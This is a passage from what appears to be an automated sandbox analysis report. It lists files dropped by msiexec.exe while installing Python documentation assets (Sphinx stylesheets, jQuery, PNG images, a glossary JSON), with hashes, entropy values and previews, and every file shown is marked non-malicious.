                                                                                                                                SHA-512:95528E1D62C27F704FCB0E305A10F2CE1364A0A4A5A66D72E1424957E31D77B1D5C58997C5543273B6AD528D29D1120C665EDCAE8142AC7FDB9FFD947DF59AE0
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR...............q.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs..........o.d..9.IDATx...{|T.?..s.3........ ...j+...UhC....X.n....nm....U${.Y.....Z.1hk......!@HB..I2..\~..d.$..7K2....N&g2.s..s...9.....j.)...."...[.1..............~.!.0|..~...o.......?F..,.".+.[J.....'.....`3.f.R.....#,../5M......Tb.#...G.;..Zx..........~G.;."...................iw8.F....n..j.w....#.!.0.*.pV.iZ8........Q.J!.o....Rm.....@DF8..X.s'Z0v.c.?.i]..w..-Tb.#...g.[.k........".C)....}..._!.........B.QAA..2v....b...0.;..3..A...$j...#..w...w.n8.L.Q.#.d!g..E."Xl.X...Y.#...!.b'...B!.4....u=...J. ....[..i.=.h..>.$.d..;w.....r..S..C....y.Xl.....j.s..v.&..`.1AH...P`.!./.1VD..9.yx~G.4)e....97B.Fp......w.@4S,..g&..1..@../|.C..".H..Q...eE~i/.F.. . ..@8..4..%..b9..4.>.$|)..@.b...g%..v.D...c@...9..6re....#] <.J).~..@.. !...^V...8h...I...;..E.....\AD.....'vS.;e!.`dw.{f.s....b...9.....X..........W.s.(.,.FhA.u....6.A..,........;CA..'...
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PNG image data, 250 x 250, 8-bit/color RGB, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33808
                                                                                                                                Entropy (8bit):7.9845728693968825
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:3i0gyi0iPWMF/gSnKK0bAot+Gq2HYxkf8UECdlVhgv2:3fgyDiPbgSnp0Cd2J93hgO
                                                                                                                                MD5:9B1263DB04E6421E7032CFED2001A5D3
                                                                                                                                SHA1:5EF1092FDE20E8251CC9592E37B9F22F9F4E87C3
                                                                                                                                SHA-256:B5528A56A8B0F2E5DA3D6F20F47057CC0325273FF152816C202F8A114CD07138
                                                                                                                                SHA-512:E3D6F048380D724A3671817C128E96CFD27ECA14C4C84D88655044E5A37D3C9635DEF1D518F7C6BCC51C0EEEC9F99F8A28E3E4B179ACC05269E8EB0F99E7F826
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR................j....iCCPICC Profile..x..gTS....9.@..zG.t)....l.$@(1.....T`,...:.C......... X....A@...XP.'pA.]w..?wg..~........@.g......I.TQ..3cYD$...`.2..h@fsR......m..@..}#q..L...i./........).$.."....R..;..+#U.0..a...@.O.9v....=.}.9!A.H.8.x2.-........X..Y.a.../@..a.N....v......Y....N...fG/.d.c.x. w".v.....f/..CRb.._....dA...l..>.e.z.0q..fu. 4x^.D...s..=h....?p@.....7....:.l/........sJz..<g...3.....Y.:?...5..k.L D~..........$.F.<.+2."Z.l.. ..[..-..k..D..T..y.y....cl.0315...o..;.[......k.3..."......+.g...d.]S.......4Q.\=.x.."..2@...........v..../..B@.X.8 ..s...Y`....`7..J..P...Ip.4...*......<..`....`.LC...(....T!-..2..!......(....P...m..B..:..@.A..-..z..Bc.[.3......k.ak..{.!.J8.N.3..x'\...'...*|.~.....I.@.Pt....e.rA.."Q1(.j#*.U.*G..Q.....8.......h#.............t5......DO..a(.%......,..b20.."L%...:.!f.3..b.X...........`.a.-.n..v......p.8..........].....>.IxU.........E.....{...4A..E.%....u.].c.f.].0a.(M.!..C...-.bb..:....D"..lH.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PNG image data, 706 x 449, 8-bit/color RGBA, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):84383
                                                                                                                                Entropy (8bit):7.964768426071419
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:AOjVYz+/90DI/2D0T7118qgxNYmKlfSyW2dSaBLgNu6DOg0wnvcHLCV1:t//eDIKwhyLYrVSy9Sa+NF+wnvce1
                                                                                                                                MD5:7114029B0D94D2852D9E6DDF0E909C2B
                                                                                                                                SHA1:B91383E188398914ECBC306FD1A23E26D5118FF9
                                                                                                                                SHA-256:BA9ABF87CADFFA7027CA298BA11CEB6418F3A9ABB32AC988C8D342E7C2B3FB2E
                                                                                                                                SHA-512:5ABE7D97E38E0419E0D5B3505F46871682886A0E7701724A73A1D451B1202327DB6CA0EFF8CB99D653E319DB8F2B46A1057029627E23100FF81EBD5755E37D73
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR.............cn......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs..........o.d....IDATx...wt\......{}.k..s....k...z<AR..A....Pq.g..H3....:.Mv..R+tnt`...9.`..3.A"....:.r!<..{...s.T@"A.}...@.S'...s...5.jFz.X,...b.X..UaT.\...b.X,....#.......<x......!......r;........<x...c.cHp<, <@.-.#.....<x........j.y.0<......._x.......<x.....UA.@.J........../x.......<x.(3..X..K.q.0\-..r.....C....<x.........Qp...U..U.. \.(............<x...C.:+..c........*!8.....0...6.w.<x.......<...b..K.q5.pI....+.............<x.....6......s.... 8.............<x.......<xD...0..~. ....a8..+D". X'r.~....r..r...<x.......7....../.?.....@....a......Q..{r..@..?...........?........<x.......<xhCg.?..IpL...h.q%.......J.L...K..G...........?......."......<x.....6....d......._E.%...@..H..i.......z...C..........jjj.{MM..#......<x......C...q......4@.?%...i....J..b......rC..#.<..<x.......<FjH..`8....+\..+....B..>9<x.......<F....t..(....*a.".... L...w..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15597
                                                                                                                                Entropy (8bit):4.791302627859881
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RskgMGN4H775IIb/wOwUXr/tNLpwrLkhNHMay4QW:p9n2LIf7
                                                                                                                                MD5:34687BC86D38936ECD3491FD506D32AE
                                                                                                                                SHA1:C19E1C274AAC9682E74659E182E947166A0E67F9
                                                                                                                                SHA-256:B008F9F53F8600DD7C85E8D19645681C6596D54E286A6FF255632016DE4FE317
                                                                                                                                SHA-512:47E3EA8D4EF5C94267198C969E8211C5600F84FBA4DDE6C8A5D9961E7D97AFD0EB3A26F8A931370B36B3DB3910D154CB4885F595C734A50C45D23F352F4DB639
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*.. * basic.css.. * ~~~~~~~~~.. *.. * Sphinx stylesheet -- basic theme... *.. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */..../* -- main layout ----------------------------------------------------------- */....div.clearer {.. clear: both;..}....div.section::after {.. display: block;.. content: '';.. clear: left;..}..../* -- relbar ---------------------------------------------------------------- */....div.related {.. width: 100%;.. font-size: 90%;..}....div.related h3 {.. display: none;..}....div.related ul {.. margin: 0;.. padding: 0 0 0 10px;.. list-style: none;..}....div.related li {.. display: inline;..}....div.related li.right {.. float: right;.. margin-right: 5px;..}..../* -- sidebar --------------------------------------------------------------- */....div.sphinxsidebarwrapper {.. padding: 10px 5px 0 10px;..}....div.sphinxsidebar {.. float: left;.. width: 230
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):245
                                                                                                                                Entropy (8bit):4.839042951368915
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:tcWPmc4slmGkaoQbFkSLcsFfQ45K/1U2S0PxcrdHDVFDMKK:tcWPIHabosnM/1U1kyhDoKK
                                                                                                                                MD5:5A8D2E6A967026598414BDF74A5DCCF1
                                                                                                                                SHA1:4068385683F99F42D1DE678EBB02957DE9A5E07B
                                                                                                                                SHA-256:97E48F22946A092E28D4306491653C06183FA76151614D10B8FB7B51DBCCA7AD
                                                                                                                                SHA-512:6846994E29E8B7BE9A410908E3A89475ADB19301615EB72E209966B77EECCE99D0DF81AE0AF012D5F29BDBFF91EC9E78711D464A552DE4C5540543F4EFABF357
                                                                                                                                Malicious:false
                                                                                                                                Preview:<svg viewBox="0 0 30 30" xmlns="http://www.w3.org/2000/svg"><path d="M7.45896 11.25H22.5351c1.043 0 1.5645 1.2598.8262 1.998l-7.5352 7.5411c-.457.457-1.2011.457-1.6582 0L6.63279 13.248c-.73828-.7382-.2168-1.998.82617-1.998z" fill="#444"/></svg>.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1948
                                                                                                                                Entropy (8bit):4.098165802952264
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:NWRQ2QkJ2Y4rOaxoj6SQVYOZL2ZN0S0py:URrn8Y49xA6SQVYuCd
                                                                                                                                MD5:A67947F515A22C46966D0C6823080A4B
                                                                                                                                SHA1:3D0B159C23E48C37DFAF6FF656E0A153224B67A1
                                                                                                                                SHA-256:FD1A5493373686EBE5AB1ED5983FAF3ADB49192773B650698B9BE9FAC48FBF25
                                                                                                                                SHA-512:4F0C2B53FDFC459963B4B152C6C0470D6E3CF808DC806BE92D57E5CCACE278B5056DC8BAD03F8412C3475AAE54B43E1DB97F7E43EA31C3E36D904154E1B7A670
                                                                                                                                Malicious:false
                                                                                                                                Preview:$(document).ready(function() {.. // add the search form and bind the events.. $('h1').after([.. '<p>Filter entries by content:',.. '<input type="text" value="" id="searchbox" style="width: 50%">',.. '<input type="submit" id="searchbox-submit" value="Filter"></p>'.. ].join('\n'));.... function dofilter() {.. try {.. var query = new RegExp($('#searchbox').val(), 'i');.. }.. catch (e) {.. return; // not a valid regex (yet).. }.. // find headers for the versions (What's new in Python X.Y.Z?).. $('#changelog h2').each(function(index1, h2) {.. var h2_parent = $(h2).parent();.. var sections_found = 0;.. // find headers for the sections (Core, Library, etc.).. h2_parent.find('h3').each(function(index2, h3) {.. var h3_parent = $(h3).parent();.. var entries_found = 0;.. // find all the entries.. h3_paren
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4676
                                                                                                                                Entropy (8bit):4.96553484114099
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:ZIGfEUh+r8fYLt9fYFtCIwQT+2OA7pFffGkG0//MtUS3JqddfB0:GeE7rcYLt1YFtCIw2+2nGkCUSZq3O
                                                                                                                                MD5:D5854455421CB58090271469CF405BEA
                                                                                                                                SHA1:06950B6BBFB6D5FB190526883876BBF7FDF8AC56
                                                                                                                                SHA-256:9F5E22214951D44C9076F60D1C77F66DD1DFB045F489E2A7047606B936A3AF16
                                                                                                                                SHA-512:7913707451554BA5150D6BA04D22DB969E4D7C76BC6A3444B90BD83FE54027FF0CE0B1981FC06583B7ED739861640AD58DE74B96CAFAA6CBC738899E584BA6A3
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*.. * classic.css_t.. * ~~~~~~~~~~~~~.. *.. * Sphinx stylesheet -- classic theme... *.. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */....@import url("basic.css");..../* -- page layout ----------------------------------------------------------- */....html {.. /* CSS hack for macOS's scrollbar (see #1125) */.. background-color: #FFFFFF;..}....body {.. font-family: 'Lucida Grande', Arial, sans-serif;.. font-size: 100%;.. background-color: white;.. color: #000;.. margin: 0;.. padding: 0;..}....div.document {.. background-color: white;..}....div.documentwrapper {.. float: left;.. width: 100%;..}....div.bodywrapper {.. margin: 0 0 0 230px;..}....div.body {.. background-color: white;.. color: #222222;.. padding: 0 20px 30px 20px;..}....div.footer {.. color: #555555;.. width: 100%;.. padding: 9px 0 9px 0;.. text-align: center;.. font-size: 75%;..}....div.footer
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2868
                                                                                                                                Entropy (8bit):4.551663079989771
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:N7W4wcc779//9cuZwXEFA8LdvLFN9Sh3HGefW8yKOlm9r7gPq8UraqVD:1Vwcc77pRwXEFH5vT9SUeeNKH93gDUG6
                                                                                                                                MD5:04F309383D41C289F65077E9E30C76F5
                                                                                                                                SHA1:EE8C3242A428ABA3528FC329F9ED2CFDE7FE50B2
                                                                                                                                SHA-256:F1AF795443875F7184331D307AA28DBA3FED73126D1D27BACEEDCF376DE52A30
                                                                                                                                SHA-512:7A20724BC4EFEAADF2B673A51F7F7B75F5C8284942B0922A943AA7D85D9104B251851E16D745265514F4B29FCE10F40EC1616C3AC5260B5F0365DE7F1FB427B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:$(document).ready(function() {. /* Add a [>>>] button on the top-right corner of code samples to hide. * the >>> and ... prompts and the output and thus make the code. * copyable. */. var div = $('.highlight-python .highlight,' +. '.highlight-python3 .highlight,' +. '.highlight-pycon .highlight,' +. '.highlight-pycon3 .highlight,' +. '.highlight-default .highlight');. var pre = div.find('pre');.. // get the styles from the current theme. pre.parent().parent().css('position', 'relative');. var hide_text = 'Hide the prompts and output';. var show_text = 'Show the prompts and output';. var border_width = pre.css('border-top-width');. var border_style = pre.css('border-top-style');. var border_color = pre.css('border-top-color');. var button_styles = {. 'cursor':'pointer', 'position': 'absolute', 'top': '0', 'right': '0',. 'border-color': border_color, 'border-style': border_s
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):28
                                                                                                                                Entropy (8bit):4.06610893983748
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:nWtfv:nWtH
                                                                                                                                MD5:0000E4EA89F1C9F5739B7F36D88477DA
                                                                                                                                SHA1:B9D1252F212DEFA2013AB47A83A1D0217155888C
                                                                                                                                SHA-256:F3D74D09F9A0D5C08E9EF211AFED3397ACE994A39748325AE53BEA62124348B1
                                                                                                                                SHA-512:80A17368195F3E41B48EE0B86D94839943CDF7C1AECE0D6D1524D297B25837589CAC78B26A497336A3997542BF801791648A71CFB80EDB018C32E3F179047E8F
                                                                                                                                Malicious:false
                                                                                                                                Preview:@import url("classic.css");.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10766
                                                                                                                                Entropy (8bit):5.018590642318749
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:t+frGEMgmTeH9hnnMfw/LJ2G7ZnaipQl3Ryoaz1grX8YRil6NzjBQ/atREc/A/PA:tLeHr/ftIegNPBs4RRbnZ
                                                                                                                                MD5:9DAE6D03EE16347421D869D801C4DD6F
                                                                                                                                SHA1:7F6C06EE04DA74C87D5E877CAB20D060660E27E5
                                                                                                                                SHA-256:B5CAD4208B5895E6182A3D6BA2A28C38BA4C3ED7DDFF4635839AA430EEE59614
                                                                                                                                SHA-512:361697EEA86A3589AC4ED8369B1B794D0BA607A756A7D31F6407F1E4F3FCC277AA586949A6A82DB73F2E1D78FA6539DD98D947C56996CF7CE1AA1D3C681BE94A
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*. * doctools.js. * ~~~~~~~~~~~. *. * Sphinx JavaScript utilities for all documentation.. *. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */../**. * select a different prefix for underscore. */.$u = _.noConflict();../**. * make the code below compatible with browsers without. * an installed firebug like debugger.if (!window.console || !console.firebug) {. var names = ["log", "debug", "info", "warn", "error", "assert", "dir",. "dirxml", "group", "groupEnd", "time", "timeEnd", "count", "trace",. "profile", "profileEnd"];. window.console = {};. for (var i = 0; i < names.length; ++i). window.console[names[i]] = function() {};.}. */../**. * small helper function to urldecode strings. *. * See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/decodeURIComponent#Decoding_query_parameters_from_a_URL. */.jQuery.urldecode = function(x) {. if (!x) {. return x. }. return decodeURI
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):436
                                                                                                                                Entropy (8bit):5.271829350705175
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:qOppyXBXzibDRd7HyLmx5wBx2kfbLNvoQWspIdQUp/UqjqJ4VsX5as+8W2avp0:17DRRZxvkfVLpI+Up/USqJ4VsN+8WDO
                                                                                                                                MD5:83FB616390629B303F24BC7C25494B98
                                                                                                                                SHA1:6BDF3A1C0FCFCDD9E73D5ECD86EA50C9D2012556
                                                                                                                                SHA-256:BBB7910ECD173485CF714EC3B48AED79FD63EFFDD1604ED84D0D1287C4410267
                                                                                                                                SHA-512:6A7FBA52F475C81B3DEC4F92366C6DE6C9ED21FD7384FD28D11F4955D3334CA1A4DB9E2C3820F5F23CEF5935889A760BF576B3F447DF12B585E109DD6137F0B3
                                                                                                                                Malicious:false
                                                                                                                                Preview:var DOCUMENTATION_OPTIONS = {.. URL_ROOT: document.getElementById("documentation_options").getAttribute('data-url_root'),.. VERSION: '3.11.0',.. LANGUAGE: 'None',.. COLLAPSE_INDEX: false,.. BUILDER: 'html',.. FILE_SUFFIX: '.html',.. LINK_SUFFIX: '.html',.. HAS_SOURCE: true,.. SOURCELINK_SUFFIX: '.txt',.. NAVIGATION_WITH_KEYS: false,.. SHOW_SEARCH_SUMMARY: true,.. ENABLE_SEARCH_SHORTCUTS: true,..};
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):286
                                                                                                                                Entropy (8bit):6.982817860477681
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:6v/lhP5bSiLBXpmOYy8sNrfqC3FfDD5dat7kcqF3pKiYofFtup:6v/7BbBZnfbF3et7kTp7c
                                                                                                                                MD5:BA0C95766A77A6C598A7CA542F1DB738
                                                                                                                                SHA1:51FD2E4EC924E822C5D434FA98CCFC70C30380F5
                                                                                                                                SHA-256:5C4BC9A16AEBF38C4B950F59B8E501CA36495328CB9EB622218BCE9064A35E3E
                                                                                                                                SHA-512:0426FE38986987303F6076D52EF28BDCF4F3AC2858E0780557471F2D0F3E055745687D0905357C6A0CD7E6F5DD1EF8FE82FF311E44499F89AB6299A41B67D8E6
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR................a....IDATx....R.....){.l. ....f.=@....:...3..~.......rX$A...X-.D.~............(.P.%......8<<.9::.....P...O&.$.....l~.X.....&....EW..^4.w.Q}......^.............i....0/H/.@F).Dzq+..j..[..SU5......h../.oY..G&Lfs|......{.....3%.U.+S..`AF.....IEND.B`.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:JSON data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):140738
                                                                                                                                Entropy (8bit):4.7945856756963465
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:z7hWC8OIm2dsArICjLAO9e7Gg5MBMtU/ckyDGab6bt7epTSldDesNn3BiheLMIVN:z7COB2dsArl5s7fntUJYmLvqVmp
                                                                                                                                MD5:4425A9310C5995EB3CC2C453D6D075FF
                                                                                                                                SHA1:BBF9F0FC043653EC841A91320E6578C60BBC8DA5
                                                                                                                                SHA-256:27B04A03D3CB274DB8CA300C2A38E072B42C63B4C5A18CE462F6A26FF001016D
                                                                                                                                SHA-512:767805E147F53543457B0BFBDF1063B34877F1354A8C0833B403F4257815045525CAE0F869625D655191B99404922AFB74FA88987F148448CC51CAD63D253531
                                                                                                                                Malicious:false
                                                                                                                                Preview:{">>>": {"title": ">>>", "body": "<main>\n<dd><p>The default Python prompt of the interactive shell. Often seen for code\nexamples which can be executed interactively in the interpreter.</p>\n</dd>\n</main>\n"}, "...": {"title": "...", "body": "<main>\n<dd><p>Can refer to:</p>\n<ul class=\"simple\">\n<li><p>The default Python prompt of the interactive shell when entering the\ncode for an indented code block, when within a pair of matching left and\nright delimiters (parentheses, square brackets, curly braces or triple\nquotes), or after specifying a decorator.</p></li>\n<li><p>The <a class=\"reference internal\" href=\"library/constants.html#Ellipsis\" title=\"Ellipsis\"><code class=\"xref py py-const docutils literal notranslate\"><span class=\"pre\">Ellipsis</span></code></a> built-in constant.</p></li>\n</ul>\n</dd>\n</main>\n"}, "2to3": {"title": "2to3", "body": "<main>\n<dd><p>A tool that tries to convert Python 2.x code to Python 3.x code by\nhandling most of the incompatibiliti
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):287630
                                                                                                                                Entropy (8bit):5.0658003996173315
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:pJChNVls+TCtlFhTzeKR7cYmD2zK8EAbEtPx+WI+Y7cFyW48L/dyVxNaIPfytrAP:xf7cYmD43APx+WI+Y7cFyMyDTPfCAeuH
                                                                                                                                MD5:23C7C5D2D1317508E807A6C7F777D6ED
                                                                                                                                SHA1:AD16C4A132AD2A03B4951185FED46D55397B5E88
                                                                                                                                SHA-256:416A3B2C3BF16D64F6B5B6D0F7B079DF2267614DD6847FC2F3271B4409233C37
                                                                                                                                SHA-512:58D2F17CFFFC71560BF6C8FC267A7A7ADD0192E6CB3F7D638531BDBE12FF179B84666839C04CCAA17A75909B25CCF416C0F4F57B23224B194A0A0CC72CE4CE4D
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*!. * jQuery JavaScript Library v3.5.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2020-05-04T22:49Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with very long lines (65451)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):89476
                                                                                                                                Entropy (8bit):5.2896589255084425
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                                MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                                SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                                SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                                SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11151
                                                                                                                                Entropy (8bit):4.821437680870218
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:sfcUhvIRZklNpOK9M09yQ7XJu9GD98u910Z90+H9X9R+NfYceyjKrpJD2H+0a53i:snztOO0pI4yWt2e0TYVI/
                                                                                                                                MD5:2E637C266DB6B988CD38B1205F26374D
                                                                                                                                SHA1:2A0DC1F38B48A6193F90212F0ABB45FC53979314
                                                                                                                                SHA-256:254CC2B52DEA6E3B50917EE685F59E884193DDAF251DF8622F30BF1B76318275
                                                                                                                                SHA-512:704A42EB28295ABCBE38186214B9E53235936001A8E29983354F609806F6F280D62C3195EB5435268229FDE1EAE2BBC39AD68E79E5B67C38EA9D4BB1FDBA4758
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*.. * language_data.js.. * ~~~~~~~~~~~~~~~~.. *.. * This script contains the language-specific data used by searchtools.js,.. * namely the list of stopwords, stemmer, scorer and splitter... *.. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */....var stopwords = ["a","and","are","as","at","be","but","by","for","if","in","into","is","it","near","no","not","of","on","or","such","that","the","their","then","there","these","they","this","to","was","will","with"];....../* Non-minified version is copied as a separate JS file, is available */..../**.. * Porter Stemmer.. */..var Stemmer = function() {.... var step2list = {.. ational: 'ate',.. tional: 'tion',.. enci: 'ence',.. anci: 'ance',.. izer: 'ize',.. bli: 'ble',.. alli: 'al',.. entli: 'ent',.. eli: 'e',.. ousli: 'ous',.. ization: 'ize',.. ation: 'ate',.. ator: 'ate',.. alism: 'al',.. iveness: 'ive',.. fulness: 'ful',..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2132
                                                                                                                                Entropy (8bit):4.676607115351314
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:1/fAwfqVCTWQ3q49nK39Z9vpB0BUZFpmZil2ueb:ZfFphu9vz0til6b
                                                                                                                                MD5:073A20E6E5721A252CCFCC3DB67EDF0D
                                                                                                                                SHA1:AF23E368B380B942247A9A7D8AEF56F3103E627E
                                                                                                                                SHA-256:D0FBEB27B75FD2C9163DE2F25926BDD72F8CDA9E2ED8A97C3002675F0847C9D6
                                                                                                                                SHA-512:4FAE91390E29B775042A27893EAFF2841482B5003C16B1DA7331F2AB1D3D3508572B8BE419E17CE8BBF07CFD137438CB5A7091DEC21C684929F2037502027E6E
                                                                                                                                Malicious:false
                                                                                                                                Preview:document.addEventListener('DOMContentLoaded', function () {.. // Make tables responsive by wrapping them in a div and making them scrollable. const tables = document.querySelectorAll('table.docutils');. tables.forEach(function(table){. table.outerHTML = '<div class="responsive-table__container">' + table.outerHTML + '</div>'. });.. const togglerInput = document.querySelector('.toggler__input');. const togglerLabel = document.querySelector('.toggler__label');. const sideMenu = document.querySelector('.menu-wrapper');. const menuItems = document.querySelectorAll('.menu'). const doc = document.querySelector('.document');. const body = document.querySelector('body');.. function closeMenu() {. togglerInput.checked = false;. sideMenu.setAttribute("aria-expanded", 'false');. sideMenu.setAttribute('aria-hidden', 'true');. togglerLabel.setAttribute('aria-pressed', 'false');. body.style.overflow = 'visible';. }. fun
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PNG image data, 11 x 11, 8-bit grayscale, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):90
                                                                                                                                Entropy (8bit):5.021779901931872
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:yionv//thPl6Cpuy+ByMlE/UtB1p:6v/lhP8CMyfMq8dp
                                                                                                                                MD5:36B1A4B05451C7ACDE7CED60B2F6BC21
                                                                                                                                SHA1:89F4178F1F917AD03726F307FE6D2E28D6A1706A
                                                                                                                                SHA-256:47E7FC50DB3699F1CA41CE9A2FFA202C00C5D1D5180C55F62BA859B1BD6CC008
                                                                                                                                SHA-512:EAD39ADF0CBB8BF803977F277632B42C62AAEEDA8E4A57DD263AAA0851562BA27F069320B2EB29B7ED93D1682A965ECD61826BDF1CB2E15A68F08AE88DDD05CF
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR...............(....!IDATx.c8...g>@.;(..!.&...........].f2n..N....IEND.B`.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):546
                                                                                                                                Entropy (8bit):5.133002607095171
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TMHdb5tyqEM8T8tl6IFpaRAiKaQ/wn4nuqWM:2db5tPs8tQ1RoYnuWM
                                                                                                                                MD5:E93ACBCB0FF9E82943EC37B14E3C23E3
                                                                                                                                SHA1:1AFE41206C442BE0E6DB345C360CEA8A2BBE101B
                                                                                                                                SHA-256:81E11423A9DBAA7E9F15083233168C19A7086597B3641FA773054121AD35A73C
